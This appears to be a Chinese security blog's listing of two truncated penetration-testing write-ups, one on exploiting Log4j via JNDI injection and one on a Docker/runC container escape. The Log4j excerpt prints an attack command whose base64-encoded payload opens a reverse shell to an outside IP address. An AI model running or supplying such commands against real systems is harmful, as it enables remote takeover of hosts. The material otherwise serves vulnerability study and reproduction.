2022-03-31 Log4漏洞利用工具 工具漏洞复现 实战渗透 攻击代码: java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC82Ni4xNTIuMTcxL
2022-03-31 Docker逃逸复现 实战渗透漏洞复现虚拟逃逸 渗透测试 漏洞简述:攻击者可以通过特定的容器镜像或者exec操作可以获取到宿主机的runC执行时的文件句柄并修改掉runc的二进制文件,从而获取到宿主机的root执行权限。 利用条件:Docker版本 < 18.09.2,runC版本<